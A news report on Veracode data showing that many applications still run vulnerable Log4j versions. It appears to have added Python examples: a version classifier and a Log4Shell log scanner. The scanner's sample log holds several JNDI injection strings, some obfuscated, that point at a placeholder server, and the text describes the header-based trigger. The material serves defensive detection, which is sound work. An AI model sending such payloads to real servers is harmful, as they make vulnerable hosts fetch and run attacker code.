Organizations are still exposed to critical vulnerabilities in Log4j two years after Log4Shell, a maximum-severity bug in the popular Java logging library, was found, according to Veracode.
The application security vendor analyzed data from software scans over the 90 days between August 15 and November 15, 2023.
These covered 38,278 unique applications running Log4j versions 1.1 to 3.0.0-alpha1 across 3,866 organizations.
The vendor found that 38% of those applications are still using vulnerable versions of Log4j.
The majority of these are running Log4j 1.2.x, the end-of-life Log4j 1 branch, which contains three critical flaws: CVE-2022-23307, CVE-2022-23305 and CVE-2022-23302.
A further 3.8% are running Log4j2 2.17.0, which contains CVE-2021-44832.
Just 2.8% are still on versions exposed to the Log4Shell vulnerabilities: Log4j2 2.0-beta9 to 2.15.0.
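The version ranges above map directly onto a dependency-inventory check. The following Python is an added example, not Veracode's tooling and not code from the article: it parses Log4j version strings (including pre-release tags such as 2.0-beta9 and 3.0.0-alpha1, which have to sort before the corresponding final release), assigns each to one of the three buckets the findings name, and reports the share of a constructed inventory in each. The inventory, bucket names and function names are the example's own; CVE-2021-44228 is the identifier for Log4Shell, which the article refers to only by name. Versions outside the three named ranges (Log4j 1.1, 2.16.0, 2.17.1 and later, the 3.0.0 alpha) are reported as "other" rather than assessed, because the findings give no figure for them.

```python
"""Classify Log4j version strings into the vulnerable ranges the findings
above describe.  Added example; not Veracode's tooling or the article's code."""
import re
from collections import Counter

# Pre-release tags sort before the final release of the same number:
# 2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1.  Rank 3 marks a final release.
_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?$", re.IGNORECASE
)


def version_key(version):
    """Turn a string such as '2.0-beta9' into a tuple that sorts in release order."""
    match = _VERSION_RE.match(version.strip())
    if not match:
        raise ValueError(f"unrecognised Log4j version: {version!r}")
    major, minor, patch, tag, tag_num = match.groups()
    return (
        int(major),
        int(minor),
        int(patch or 0),
        _PRE_RANK[tag.lower()] if tag else 3,
        int(tag_num or 0),
    )


# The Log4Shell range as the report groups it, inclusive at both ends.
LOG4SHELL_LOW = version_key("2.0-beta9")
LOG4SHELL_HIGH = version_key("2.15.0")
CVE_2021_44832_VERSION = version_key("2.17.0")


def classify(version):
    """Map one version to a bucket named in the findings, or 'other'."""
    key = version_key(version)
    if key[0] == 1 and key[1] == 2:
        # End-of-life Log4j 1 branch: CVE-2022-23307, CVE-2022-23305, CVE-2022-23302
        return "log4j-1.2.x"
    if LOG4SHELL_LOW <= key <= LOG4SHELL_HIGH:
        return "log4shell-range"      # 2.0-beta9 through 2.15.0 (CVE-2021-44228)
    if key == CVE_2021_44832_VERSION:
        return "2.17.0"               # CVE-2021-44832
    # Everything else (1.1, 2.16.0, 2.17.1 and later, 3.0.0-alpha1) is not
    # assessed here: the findings give no figure for it.
    return "other"


def summarize(versions):
    """Percentage of an inventory in each bucket, plus the combined share of
    the three vulnerable buckets, mirroring the report's headline figure."""
    counts = Counter(classify(v) for v in versions)
    total = len(versions)
    shares = {bucket: round(100 * n / total, 1) for bucket, n in counts.items()}
    vulnerable = sum(n for bucket, n in counts.items() if bucket != "other")
    shares["vulnerable-total"] = round(100 * vulnerable / total, 1)
    return shares


# Constructed inventory of ten applications (not Veracode's data).
SAMPLE_INVENTORY = [
    "1.2.17", "1.2.17", "1.2.17",     # Log4j 1.2.x
    "2.14.1",                         # Log4Shell range
    "2.17.0",                         # CVE-2021-44832
    "2.17.1", "2.20.0", "2.21.1",     # 2.17.1 and later: not in any bucket
    "3.0.0-alpha1",                   # outside the three buckets
    "1.1.3",                          # Log4j 1.1: outside the three buckets
]

if __name__ == "__main__":
    for version in sorted(set(SAMPLE_INVENTORY), key=version_key):
        print(f"{version:>14}  {classify(version)}")
    print(summarize(SAMPLE_INVENTORY))
```

Feed it the Log4j versions pulled from a build's dependency tree (Maven or Gradle output, or the `Implementation-Version` in each bundled log4j jar's manifest); the pre-release ordering matters because a naive string comparison would place 2.0-beta9 after 2.0.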
Log4Shell itself was also relatively easy for threat actors to exploit: they only had to get a vulnerable application to log a crafted string containing a JNDI lookup, such as ${jndi:ldap://...} placed in an HTTP header, which affected versions resolved by fetching and executing attacker-supplied code from the named server.
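What "log a crafted string" means for a defender is that the trigger can sit in any field the application logs, most often a request header or URL. The following Python is an added example (constructed log lines, hypothetical function names; not code from the article or from Veracode) of scanning web server access logs for that trigger, including the common evasion of nesting Log4j's own lower:, upper: and default-value lookups so that the literal text jndi never appears in the raw line. The scanner first collapses those nested lookups the way the vulnerable versions would, then matches the result. It is a retrospective detection heuristic that handles only the three obfuscation forms it implements, and it is no substitute for upgrading.

```python
"""Scan log lines for the Log4Shell trigger (a JNDI lookup), resolving the
nested-lookup obfuscations attackers used to hide the literal "jndi".
Added example; the sample log lines below are constructed, not real traffic."""
import re

# An innermost ${...} lookup: a body with no further braces.  "$" is allowed
# in the body so that "${::-$}{jndi:..." style splitting is also collapsed.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# The trigger itself, once obfuscation has been stripped.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(body):
    """Evaluate one obfuscation lookup the way Log4j 2 would, or return
    None to leave it as-is (jndi:, date: and other real lookups)."""
    prefix, sep, rest = body.partition(":")
    name = prefix.lower()
    if name == "jndi":
        return None                  # the lookup we are hunting for
    if ":-" in body:                 # ${x:-default} -> default
        return body.split(":-", 1)[1]
    if sep and name == "lower":      # ${lower:J} -> j
        return rest.lower()
    if sep and name == "upper":      # ${upper:n} -> N
        return rest.upper()
    return None


def _collapse(match):
    resolved = _resolve(match.group(1))
    return match.group(0) if resolved is None else resolved


def normalize(line):
    """Repeatedly collapse innermost obfuscation lookups until nothing changes.
    Every substitution removes one brace pair, so the loop terminates."""
    previous = None
    while previous != line:
        previous = line
        line = _INNER.sub(_collapse, line)
    return line


def is_log4shell_probe(line):
    """True if the line, after de-obfuscation, carries a JNDI lookup."""
    return _JNDI.search(normalize(line)) is not None


def scan(log_text):
    """1-based numbers of the lines that carry a JNDI lookup."""
    return [n for n, line in enumerate(log_text.splitlines(), 1)
            if is_log4shell_probe(line)]


# Constructed Apache-style access log (documentation addresses throughout);
# line 5 carries a benign Log4j lookup that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:rmi}://203.0.113.9:1099/x}"
10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=${::-$}{${env:NOPE:-jn}di:dns://203.0.113.9/y} HTTP/1.1" 400 0 "-" "curl/7.79"
10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for n in scan(SAMPLE_LOG):
        print(n, normalize(SAMPLE_LOG.splitlines()[n - 1]))
```

Run it over access logs, proxy logs and any application log that echoes request data; a hit tells you a probe reached a logging path, not that it succeeded, so follow up by checking outbound LDAP, RMI or DNS traffic from the host around the same timestamp.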
By March 2022, some of the worst fears of the security community were realised when new research revealed that Log4Shell had been used as the initial infection vector in 31% of compromises.
Veracode argued that although the massive effort to patch the original Log4j bug has been successful, its findings show there is still some way to go.
This Cyber News was published on www.infosecurity-magazine.com. Publication date: Mon, 11 Dec 2023 09:30:19 +0000